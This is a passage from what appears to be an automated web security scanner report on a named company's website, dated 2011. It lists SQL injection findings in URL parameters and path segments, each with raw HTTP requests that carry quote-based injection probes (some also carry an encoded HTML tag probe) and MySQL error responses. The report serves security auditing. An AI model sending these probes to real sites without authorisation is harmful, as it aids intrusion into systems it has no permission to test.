</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:33 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.104. http://www.millerwelds.com/landing/drive/ [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad'&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:07 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=502FC4F3B0CC4224C24AEB19BC92226F; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad''&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:09 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.105. http://www.millerwelds.com/landing/drive/ [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV'&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:18 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5E13222BB78ACE8FA8D536638E608756; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV''&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:20 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.106. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:58 GMT
Connection: Keep-Alive
Content-Length: 27875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arro' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:59 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.107. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:48 GMT
Connection: Keep-Alive
Content-Length: 27800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:49 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.108. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:22 GMT
Connection: Keep-Alive
Content-Length: 27906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/prod' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:23 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.109. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.110. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf'/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:17 GMT
Connection: Keep-Alive
Content-Length: 27701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.111. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf/001625sites_QMS.pdf' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/pdf/001625sites_QMS.pdf''' at line 1)<br>
...[SNIP]...

1.112. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:47 GMT
Connection: Keep-Alive
Content-Length: 27704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.113. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
